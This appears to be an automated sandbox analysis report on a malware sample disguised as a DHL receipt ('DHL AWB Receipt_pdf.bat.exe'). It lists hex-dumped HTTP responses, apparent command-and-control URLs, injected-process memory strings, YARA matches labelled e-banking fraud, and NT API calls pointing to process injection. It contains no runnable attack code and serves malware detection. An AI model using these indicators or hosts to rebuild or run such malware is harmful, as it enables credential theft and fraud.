0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:54 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:56 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:59 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 
68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: EhStorAuthn.exe, 00000012.00000002.4688612074.0000000005796000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://primepath.net/esw3/?-n=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbV
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2318069311.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, oSJLRdDbLeQ.exe, 0000000B.00000002.2438281120.000000000320C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ctd5Fl0jEEYLVK.exe, 00000014.00000002.4689681317.0000000004EBD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rbopisalive.cyou
                Source: ctd5Fl0jEEYLVK.exe, 00000014.00000002.4689681317.0000000004EBD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rbopisalive.cyou/2dxw/
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EhStorAuthn.exe, 00000012.00000002.4688612074.0000000006102000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000038E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: EhStorAuthn.exe, 00000012.00000002.4688612074.0000000005ABA000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.000000000329A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: EhStorAuthn.exe, 00000012.00000003.2669451776.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample Static PE information: Filename: DHL AWB Receipt_pdf.bat.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0042C763 NtClose,10_2_0042C763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012B60 NtClose,LdrInitializeThunk,10_2_01012B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_01012DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_01012C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010135C0 NtCreateMutant,LdrInitializeThunk,10_2_010135C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01014340 NtSetContextThread,10_2_01014340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01014650 NtSuspendThread,10_2_01014650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012B80 NtQueryInformationFile,10_2_01012B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012BA0 NtEnumerateValueKey,10_2_01012BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012BE0 NtQueryValueKey,10_2_01012BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012BF0 NtAllocateVirtualMemory,10_2_01012BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012AB0 NtWaitForSingleObject,10_2_01012AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012AD0 NtReadFile,10_2_01012AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012AF0 NtWriteFile,10_2_01012AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012D00 NtSetInformationFile,10_2_01012D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012D10 NtMapViewOfSection,10_2_01012D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012D30 NtUnmapViewOfSection,10_2_01012D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012DB0 NtEnumerateKey,10_2_01012DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012DD0 NtDelayExecution,10_2_01012DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012C00 NtQueryInformationProcess,10_2_01012C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012C60 NtCreateKey,10_2_01012C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012CA0 NtQueryInformationToken,10_2_01012CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012CC0 NtQueryVirtualMemory,10_2_01012CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012CF0 NtOpenProcess,10_2_01012CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012F30 NtCreateSection,10_2_01012F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012F60 NtCreateProcessEx,10_2_01012F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012F90 NtProtectVirtualMemory,10_2_01012F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012FA0 NtQuerySection,10_2_01012FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012FB0 NtResumeThread,10_2_01012FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012FE0 NtCreateFile,10_2_01012FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012E30 NtWriteVirtualMemory,10_2_01012E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012E80 NtReadVirtualMemory,10_2_01012E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012EA0 NtAdjustPrivilegesToken,10_2_01012EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01012EE0 NtQueueApcThread,10_2_01012EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01013010 NtOpenDirectoryObject,10_2_01013010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01013090 NtSetValueKey,10_2_01013090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010139B0 NtGetContextThread,10_2_010139B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01013D10 NtOpenProcessToken,10_2_01013D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01013D70 NtOpenThread,10_2_01013D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0151EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014F7E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FCB970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0104EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01015130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01027E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0105F290 appears 105 times
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: invalid certificate
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2321794272.00000000033D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2327742800.00000000070D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2317577522.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000000.2210815987.0000000000106000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameroUW.exe: vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2318069311.0000000002511000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2327292490.0000000006A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2328152386.00000000087C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exeBinary or memory string: OriginalFilenameroUW.exe: vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: oSJLRdDbLeQ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
